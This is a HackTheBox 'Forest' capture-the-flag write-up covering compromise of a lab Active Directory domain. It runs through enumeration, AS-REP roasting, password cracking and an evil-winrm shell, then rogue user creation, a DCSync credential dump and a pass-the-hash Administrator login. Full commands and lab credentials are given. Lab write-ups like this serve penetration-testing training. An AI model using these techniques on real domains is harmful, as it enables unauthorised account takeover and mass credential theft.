# HackTheBox Forest writeup

Forest is an awesome Windows-based machine, difficulty was set as “Easy”, user score is 4.6.

This machine is all about Active Directory exploitation.

# Enumeration

Start with nmap scan:

```bash
nmap -sS -sV -p- 10.10.10.161PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
```

Continue with `enum4linux`:

```bash
enum4linux -a forest.htb
```

Output is massive, but contain some useful information:

* `FOREST.htb.local` is the domain controller
    
* `EXCH01.htb.local` is an Exchange server
    
* Users sebastian, santi, andy, lucinda, mark and svc-alfresco
    

---

# Exploitation

AS-REP Roasting is an attack against Kerberos for user accounts that do not require preauthentication. During preauthentication, a user will enter their password which will be used to encrypt a timestamp and then the domain controller will attempt to decrypt it and validate that the right password was used and that it is not replaying a previous request. If a user is configured to not require Kerberos pre-authentication, anyone can send a request (AS\_REQ) to the KDC and receive a response (AS\_REP). The response contains an encrypted chunk of data related to that user that can be cracked offline to retrieve the user's password. This can be automatized with tools like Impacket [GetNPUsers.py](http://GetNPUsers.py):

```bash
GetNPUsers.py htb.local/ -usersfile users.txt -format john
```

We get a hash for a service account `svc-alfresco`, now it’s time to crack it with `john`:

```bash
john --wordlist=./rockyou.txt hash.txt
```

The password is `s3rvice`.

As we got in nmap results, the `5985` port is open which is used for Windows remote management, we can use `Evil-WinRM` to pop up a shell:

```bash
evil-winrm -u svc-alfresco -p s3rvice -I 10.10.10.161 -s ‘BloodHound/Ingestors/’


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
```

The `-s` flag here stands for importing scripts, you can also use `-e` to import .exe files (to run the `mimikatz`, for example). That flag will help in the Privilege Escalation phase.

---

# Privilege Escalation

User `svc-alfresco` does not have any write permissions, but as we used `-s` flag for `Evil-WinRM` it’s not needed:

```bash
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-SharpHound
```

Evil-`WinRM` also has a great feature that allows you to download a .zip file from a `SharpHound`:

```bash
download remote_filename` or `download remote_filename destination_filename
```

Run a `BloodHound` and drag-and-drop the .zip from a `SharpHound`. Now we have a valid path for privileged escalation to Domain Admin. As a service account `svc-alfresco` is a member of `Account Operators` can create new accounts with the right in `Exchange Windows Permissions` group.

Creating a new user. As `Evil-WinRM` is running the PowerShell by default, we can use both CMD’s and PS’s ways to do so:

```bash
net user z3v5 p@ssw0rd /domain /add
net group ‘Exchange Windows Permissions’ z3v5 /domain  /add
```

OR

```bash
$pass = ConvertTo-SecureString "p@ssw0rd" -AsPlainText -Force
New-ADUser z3v5 -AccountPassword $pass -Enabled $True
Add-ADGroupMember -Identity "Exchange Windows Permissions" -members z3v5
```

New user `z3v5` is a part of the `Exchange Windows Permissions` group now and that’s mean we can perform `DCSync` attack now. `DCSync` right allows an attacker to simulate the behavior of a Domain Controller, and it has two stages:

* Discover the Domain Controller in the provided domain
    
* Request the Domain Controller to replicate the user credentials
    

To automate that we can use [`secretsdump.py`](http://secretsdump.py) from `Impacket`:

```bash
secretsdump.py z3v5:p@ssw0rd@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
```

Plenty of different options for what to do with the hash of the `Administrator` account, but I followed one the `Evil-WinRM`:

```bash
evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
```

---

# Links

* [Impacket](https://github.com/SecureAuthCorp/impacket)
    
* [Evil-WinRM](https://github.com/Hackplayers/evil-winrm)
    
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
